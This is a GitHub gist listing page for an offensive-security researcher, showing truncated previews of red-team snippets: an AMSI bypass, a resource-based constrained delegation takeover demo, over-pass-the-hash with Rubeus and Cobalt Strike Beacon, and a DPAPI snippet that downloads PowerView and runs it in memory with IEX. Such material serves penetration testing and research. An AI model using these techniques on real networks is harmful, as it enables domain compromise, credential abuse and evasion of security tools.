Will HarmJ0y
@HarmJ0y
HarmJ0y / patchless_amsi.h
Created May 13, 2022 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@HarmJ0y
HarmJ0y / dc_cert_template.ps1
Created Sep 13, 2021
DC Certificate Template Enumeration
View dc_cert_template.ps1
$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % {
$Entry = $_.GetDirectoryEntry()
$SAM = $Entry.samAccountName[0]
$DN = $Entry.distinguishedName[0]
try {
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate)
$Exp = $Cert.GetExpirationDateString()
@HarmJ0y
HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active Jun 9, 2022
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Jun 17, 2022
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@HarmJ0y
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
<#
.SYNOPSIS
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Jun 28, 2022
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None